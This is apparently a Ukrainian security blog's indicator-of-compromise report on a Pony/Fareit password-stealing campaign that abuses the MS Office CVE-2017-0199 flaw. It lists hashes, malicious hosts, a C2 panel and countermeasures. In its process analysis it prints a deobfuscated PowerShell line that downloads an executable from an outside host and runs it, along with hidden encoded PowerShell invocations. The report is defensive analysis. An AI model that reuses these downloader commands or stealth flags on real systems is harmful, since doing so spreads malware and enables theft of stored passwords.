IOC_Pony_030518

Доброго вечора, панове.

Вчора була зафіксована розсилка троянського коду типу #Pony (за альтернативною класифікацією – #Fareit)

Цей тип шкідливого коду застосовується для крадіжки збережених паролів. Ми вже розбирали його варіант 27/02.

Рівень загрози, для організацій котрі не мають оновлень вразливості MS Office 2017-0199, – високий.

Станом на 16:00 4/05 джерело досі активне!

А для тих, хто уважно читає наші поради – низький.

Користувачі захисту кінцевих точок McAfee, зверніть увагу, документ та Payload перехоплюються по DAT.

Трохи аналітики:

  • RTF > 2017-0199 > HTA > PowerShell > EXE
  • Payload не кодований (This program must be run under Win32)
  • Завантаження HTA файлу засобами Winword
  • Завантаження та запуск основної частини відбувається засобами PowerShell
  • Інструкція для PowerShell кодовані, виклик прихований та обфускований (ключі -ex BYPass -NOP -w hiddeN -ec )
  • Payload зберігається і запускається з чітко прописаним іменем і шляхом (AppdAta\carin.exe)
  • Перевірка параметрів системи
  • Спроб закріплень не проводив – запустився, спробував передати і завершив себе
  • Не потребує прав Адміністратора

І так, проблеми будуть у тих, хто:

  • Не застосували виправлення 2017-0199
  • Не заборонили трафік для winword.exe (більше 50% організацій)
  • Не заборонили прихований виклик powershell та кодовані команди (більше 50% організацій)
  • Не заборонили трафік для powershell (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

Схема атаки:

email > Attach (.doc = RTF) > GET ifeoma/htabuk.hta > mshta.exe > Powershell > GET /ifeoma/buk.exe > AppdAta\carin.exe

Файл приманка, справжній тип – RTF

RTF документ містить посилання на HTA файл

Джерело HTA та Payload (станом на 16:00 4/05 досі активне!)

Схема інфікування (включно із winword)

Схема інфікування (тільки powershell)

Маркери IOC:

файл приманка (RTF із вразливістю 2017-0199 )

SHA-256        b2d64492b92ce1d794b9d832b76f91c456f86498d512eb227164a58b6c0d833a
File name   revised invoice.doc
File size      221.6 KB

Ініціює завантаження HTA при відкритті

h11p://dhm-mhn{.} com/ifeoma/htabuk.hta

HTA файл з кодованими інструкціями для PowerShell

SHA-256        ae6a2f89c47aad291662d44db21f6cdd78e649c6027996247779cf02cc13ae5f
File name   htabuk.hta
File size      2.29 KB

Обробка НТА інструкцій викликає завантаження через PowerShell

h11p://www.dhm-mhn{.} com/ifeoma/buk.exe

Основна частина #Pony

SHA-256    c81a6211b9f1fbfc5c0b46151c29879f285a70b7a82d3cf2f262d96865a7fd82
File name   buk.exe    >>    AppdAta\carin.exe
File size      595.5 KB

Забрані паролі публікуються тут

h11p://detailingpro.co{.} in/wp-includes/panelnew/gate.php

Мережеві IOC:

108.167.172.151        dhm-mhn{.} com        Mozilla/4.0          GET /ifeoma/htabuk.hta 
108.167.172.151        dhm-mhn{.} com                                GET /ifeoma/buk.exe 
103.250.185.138        detailingpro.co.in         Mozilla/4.0          POST /wp-includes/panelnew/gate.php

Активність по процесам:

Коли жертва відкриває RTF документ-приманку winword завантажує HTA файл.

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\mshta.exe -Embedding

HTA файл містить кодовані інструкції:

@encoded (base64)

IAAMACAAUwBlAHQALQBDAG8AbgB0AEUAbgB0AAkA…==

@decoded


 � �S�e�t�-�C�o�n�t�E�n�t�       �      �      �-�v�A� � � �(�   �
 � �n�E�w�-�o�B�J�e�c�t� �

@deobfuscated

Set-ContEnt-vA ( nEw-oBJect sYstem.NET.WeBCLiEnT).
DoWNloAdDATa(  h11p://dhm-mhn{.} com/ifeoma/buk.exe)-En
BYTe-PAth   $ENv:aPPDATa\carin.exe ; sTaRt$Env:AppdAta\carin.exe

Обробка HTA призводить до виклику PowerShell який завантажує та запускає основну частину:

"C:\Windows\sysTEM32\WINdOWsPoWeRShELL\v1.0\pOWershElL.eXe"  "  POWerShElL.EXE  -ex  BYPass -NOP -w        hiddeN  -ec        IAAMACAAUwBlAHQALQBDAG8AbgB0AE…

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -ex BYPass -NOP -w hiddeN -ec IAAMACAAUwBlAHQAL…

"C:\Users\operator\AppData\Roaming\carin.exe"

Після запуску зразок намагається з’єднатися із C2, спроб закріплень не проводив

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність наданих вище маркерів
  • Відмова від використання RTF формату як застарілого та вразливого
  • Розгортання виправлень вразливості MS Office 2017-0199
  • Заборона мережевої активності для додатків MS Office та mshta.exe – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборона завантаження HTA файлів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона прихованого виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Tags: , , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: